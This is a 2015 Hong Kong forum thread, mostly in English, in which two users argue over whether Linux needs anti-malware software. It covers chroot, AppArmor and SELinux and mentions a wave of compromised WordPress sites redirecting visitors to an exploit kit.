本帖最後由 vichui 於 2015-9-18 12:40 編輯

回覆 10# samiux

That's why I have to said you have miss-understand in deeply.
What a adv Linux user will tell other is "SECURE YOUR SYSTEM" , anti-virus and malware detect software is "NO USE". That doesn't mean Linux is impossible to be infected by virus and malware!!

Linux has possibility to be infected by virus and malware!! But to protected your Linux, software listed in your has no use and your articles LEAD a newbie to think they are safety after using software you listed. Actually there is no different after using software you listed. -- That is what I mean "MORE RISKY"!! RISKY is the mind but not the system.

Moreover , most of the Linux inflected can be prevented if you have secured your system, including  "Browser attack".

Of coz using Linux has a learning cure. This is a MUST and no shortcut.
Yes , there has no "bullet proof" system!! What you can have is a nearly "bullet proof" system, and that need your continuously maintain and any naive will kill it.

"As of 2011 the majority of active malware threats were worms or trojans rather than viruses." --> do you know why? The increasing doesn't mean anything. The increasing just
mean the user behaviours is being go worst!!

Why adv user said Linux can live without any anti-virus and malware detect software??
The key point is on the user, a Windows user are trained to install software to prevent inflected while a REAL Linux user are trained and have to secured their system over the time. That is different about Intrusion detection system and Intrusion prevention system.
In Linux world, we emphasized in prevention over the detection.

So when you hear people said Linux no need anti-virus and malware detect software next time, the main message is "Could you please learn how to use Linux in a correct way?".

TOP

@vichui,

In my opinion, the trend of worms and trojans are increased due to the fact that viruses cannot remote control the victim systems and gain benefit from them.  While worms or trojans can do almost anything on victim systems.  In the mean time, the applications are becoming more complicated and user-friendly than before.  Security and user-friendly are in oppose directions.

It is true that there is a small portion of users (including Windows and Linux) are not using their systems in a proper way or in a secure way.  There are a large of portion of users are using there systems in a proper way but they do not have security in mind.  Almost all users (even advanced users) do not fully understand what the information security about and what the vulnerabilities about as well as how the hackers did.

For example, the recently famous telephone deception in Hong Kong, almost all victims are using their telephone sets in a very correct way (I think so).  However, they are being deceived.  

Moreover, do you think almost all citizens are using locks and metal gates in a correct way?  Not just lock them up?  Why their flats have been burgled?

So, what is a secured system and secured behavior are?  Just up-to-date and has a strong password in the system?  Users not to do illegal and not ethical activities?  Is that enough?

When someone else told you that locks and metal gates are useless, you are not required to install them.  You just learn how to use your flat (may be your wooden door) in a correct way.  Is that true?  Or I misunderstood your message again?

Windows users install anti-virus as they learnt that it is necessary.  Yes, they are trained to be.  It is because of virus the years ago.  At that time, virus only doing harm to the system and operation but the hackers have no profit gains.  However, hackers can gain profit from their victims with malware today.

Nowadays, Windows users still install anti-virus as they do know that worms and trojans are more scareness.  Even they installed anti-virus, they may also have chance to be infected.

In general speaking, Windows and Linux are very similar systems in term of security today.  Why Windows users can armoured themselves but Linux users need to be naked?  I think that it is nonsense.  Even you, no matter a Windows or Linux user, have chance to be infected by malware when you are using your systems in a correct/proper/secure way with or without anti-virus/malware programs.  That is why you need precaution measurement, that is what you said "Prevention".

By the way, I am really curious to know that how you prevent from being attacked by "Browser Attack" by not installing any additional software but just use your system in a correct way?  

May I say a story?  Once upon a time, when a scientist said that the earth is round and it is not flat, he would be burnt to death.

Thank you.

Samiux

TOP

Why not? Of course Linux is vulnerable to malware too.  Malware codes do not need to be running as root, running as non-privilege user can also cause damage, e.g. leaking that non-privilege user's data.   Malware run as non-privilege user can also participate in network attack.  So your statement is true.

TOP

回覆 12# samiux

Don't you know lock have different security level ?
A weak gate and lock, you need more add-on to protect, to monitor.
a strong  gate and lock,  you need less add-on to protect, to monitor.

"In general speaking, Windows and Linux are very similar systems in term of security today", Is it true? absolutely not!! It is well know that Linux is secure than Windows , Why? It is  all about their kernel design. Even same browser - Firefox or Chromium, did they the same?

How? many answer, chroot, iptables rule, apprmon and so on so on..
But again, keep your system update-to-date. That's what result I using your so called naked Linux for 10 year without any inflected.

TOP

本帖最後由 samiux 於 2015-9-18 17:26 編輯

@vichui,

I do doubt that any lock that locksmith (may be lockpickers) cannot open?

Windows and Linux are very similar operating systems in term of security.  They all have the similar protection schemes, such as ASLR, DEP, XD/NX and etc as well as users profiles.

I am curious that Chromium is more secure than Firefox?  Linux is more secure than Windows?  I am doubt too.

For Chromium, the recent vulnerability is GLSA 201507-18.  You really believe that Chromium is more secure than Firefox?  

For Linux, the CVE database of Linux kernel is here.  You really believe that Linux is more secure than Windows?

"apprmon"?  May be you are talking about Apparmor.  Apparmor is not available or cannot be easily installed on some Linux systems.

You are talking about using chroot, iptables and apparmor and etc to secure your browser?  If so, I think I do not know how you can secure your browser with iptables rules.

Okay, I think we need to know the following terms (Chroot, Apparmor and SELinux) before going further.

What is chroot?

According to Wiki, a chroot on Unix operating systems is an operation that changes the apparent root directory for the current running process and its children. A program that is run in such a modified environment cannot name (and therefore normally cannot access) files outside the designated directory tree. The term "chroot" may refer to the chroot(2) system call or the chroot(8) wrapper program. The modified environment is called a "chroot jail".

Chroot is included in the user namespaces since Linux kernel 3.8.

There are some limitations according to the Wiki.  They are :

The chroot mechanism is not intended to defend against intentional tampering by privileged (root) users. On most systems, chroot contexts do not stack properly and chrooted programs with sufficient privileges may perform a second chroot to break out. To mitigate the risk of this security weakness, chrooted programs should relinquish root privileges as soon as practical after chrooting, or other mechanisms – such as FreeBSD Jails – should be used instead. Note that some systems, such as FreeBSD, take precautions to prevent the second chroot attack.[7]

On systems that support device nodes on ordinary filesystems, a chrooted root user can still create device nodes and mount the file systems on them; thus, the chroot mechanism is not intended by itself to be used to block low-level access to system devices by privileged users. It is not intended to restrict the use of resources like I/O, bandwidth, disk space or CPU time. Most Unixes are not completely file system-oriented and leave potentially disruptive functionality like networking and process control available through the system call interface to a chrooted program.

At startup, programs expect to find scratch space, configuration files, device nodes and shared libraries at certain preset locations. For a chrooted program to successfully start, the chroot directory must be populated with a minimum set of these files. This can make chroot difficult to use as a general sandboxing mechanism.

Only the root user can perform a chroot. This is intended to prevent users from putting a setuid program inside a specially crafted chroot jail (for example, with a fake /etc/passwd and /etc/shadow file) that would fool it into a privilege escalation.

Some Unixes offer extensions of the chroot mechanism to address at least some of these limitations (see Implementations of operating system-level virtualization technology).

What is Apparmor?

According to Wiki, AppArmor ("Application Armor") is a Linux kernel security module released under the GNU General Public License that allows the system administrator to associate a security profile with each program, which restricts the capabilities of that program. It supplements the traditional Unix discretionary access control (DAC) model by providing mandatory access control (MAC). It was included as of the 2.6.36 version of the mainline Linux kernel. Since 2009, Canonical Ltd. contributes to the ongoing AppArmor development.[vague]

In addition to manually specifying profiles, AppArmor includes a learning mode, in which violations of the profile are logged, but not prevented. This log can then be turned into a profile, based on the program's typical behavior.

AppArmor is implemented using the Linux Security Modules (LSM) kernel interface.

AppArmor is offered in part as an alternative to SELinux, which critics consider difficult for administrators to set up and maintain.  Unlike SELinux, which is based on applying labels to files, AppArmor works with file paths. Proponents of AppArmor claim that it is less complex and easier for the average user to learn than SELinux. They also claim that AppArmor requires fewer modifications to work with existing systems:[citation needed] for example, SELinux requires a filesystem that supports "security labels", and thus cannot provide access control for files mounted via NFS. AppArmor is filesystem-agnostic.

What is SELinux?

According to Wiki, Security-Enhanced Linux (SELinux) is a Linux kernel security module that provides a mechanism for supporting access control security policies, including United States Department of Defense–style mandatory access controls (MAC).

SELinux is a set of kernel modifications and user-space tools that have been added to various Linux distributions. Its architecture strives to separate enforcement of security decisions from the security policy itself and streamlines the volume of software charged with security policy enforcement. The key concepts underlying SELinux can be traced to several earlier projects by the United States National Security Agency (NSA).

After knowing what is Chroot, Apparmor and SELinux, you may know that you need some effort to make them work on your systems.  They may not be implemented on your Linux system by default.  If they are implemented by default, they may have limited services (or says programs/processes) to be protected.  

Personally, I prefer Apparmor to Chroot and SELinux.  It is because it is more user-friendly and easier for trouble-shooting.  As far as I know, even Ubuntu do not enable (I mean enforce mode) Apparmor for Chromium and Firefox by default.

For general users, it is too hard for them to implement Chroot, Apparmor or SELinux even they are following tutorials or guides.  Basically, Apparmour on Ubuntu is more easiler to implement when they are following tutorials or guides if they have a good one.

Fair to say, even some Windows users can run their Windows systems without any anti-virus over 10 years without getting any infection.  Or, may be they do not know that they are already infected just like you.

In conclusion, Linux users are required at least some degree of protection, such as Apparmor and/or anti-malware.

Thank you.

Samiux

Update reason : fix typo

TOP

Do I hypersensitive in Linux requires anti-malware or other protection?

I am sure that I am not.  About 3 hours earlier, security researchers posted to their blog/site that a lot of WordPress websites have been compromised and the number of compromised is increased significantly in the past 48 hours.

The malware final goal is to use as many compromised websites as possible to redirect all their visitors to a Nuclear Exploit Kit landing page. These landing pages will try a wide variety of available browser exploits to infect the computers of unsuspecting visitors.

If you think about it, the compromised websites are just means for the criminals to get access to as many endpoint desktops as they can. What’s the easiest way to reach out to endpoints?  Websites, of course.

Most WordPress sites are building on Linux systems.  The infection media are websites and browsers.  Those browsers may be on Windows or Linux or even Mac OSX and etc.

Hope you are alerted that what I said before.

Thank you.

Samiux

TOP

提示: 作者被禁止或刪除 內容自動屏蔽

TOP

@hollyhui99a,

Sorry about that.  It is very hard for me to type a piece of article in Chinese.  Please use Google Translate when necessary.

Thank you.

Samiux

TOP

haha,  the point is why the wordpress can be inflected?  

have you think about?  

I also running more then 4 wordpress site,  but none of them are inflected..

It is all about setting problem and bug.  
yes you will know if you have install midware detect,  but that mean you were inflected.  

for how to prevent?  user like you will not fully understand.  becoz you dont think it is possible..

TOP

本帖最後由 samiux 於 2015-9-18 21:17 編輯

@vichui,

I do not fully understand how to prevent and think it is impossible?  You may be right or may be wrong.

I think it is a high time for me to introduce myself in order to let you know my basic background.  Although it is not indicated something, but it will tell you what I am.

I am an Offensive Security Certified Expert (OSCE), Offensive Security Certified Professional (OSCP) and Offensive Security Wireless Professional (OSWP).  Make it simple, I can attack and exploit development as well as defense.  Basically, I fullfill the job requirements of UK Government Ministry of Defense.

I am also managing a small network with Linux web server, Linux servers, Linux desktops and Windows desktops as well as two Intrusion Prevention System sensors.  I also know how to programming, such as bash, PHP, Python, Node.js, and C.  I also have some successful open source projects.  When I have spare time, I will do Infosec researches.

You can say that I am an attacker, developer and sysadmin.  I build things and also break things.  I have the attacker point of view when handling Information Technology and Information Security matters.  I do know what hackers do.  I almost also know what and how they think.

I am a long term Linux user since 1995.  I switch to Ubuntu in 2006.  I am also a blogger since 2007.

My slogans are "Think like a criminal and act as a professional" and "While you do not know attack, how can you know about defense?".

Okay, let's go back to the news.  You focus on WordPress sites compromise while I focus on WordPress sites compromise and browsers exploit.  The user's browsers are being exploited when they are visiting the malicious sites (compromised sites).

By the way, your self-introduction is welcome.

Thank you.

Samiux

Update reason : fix typo

TOP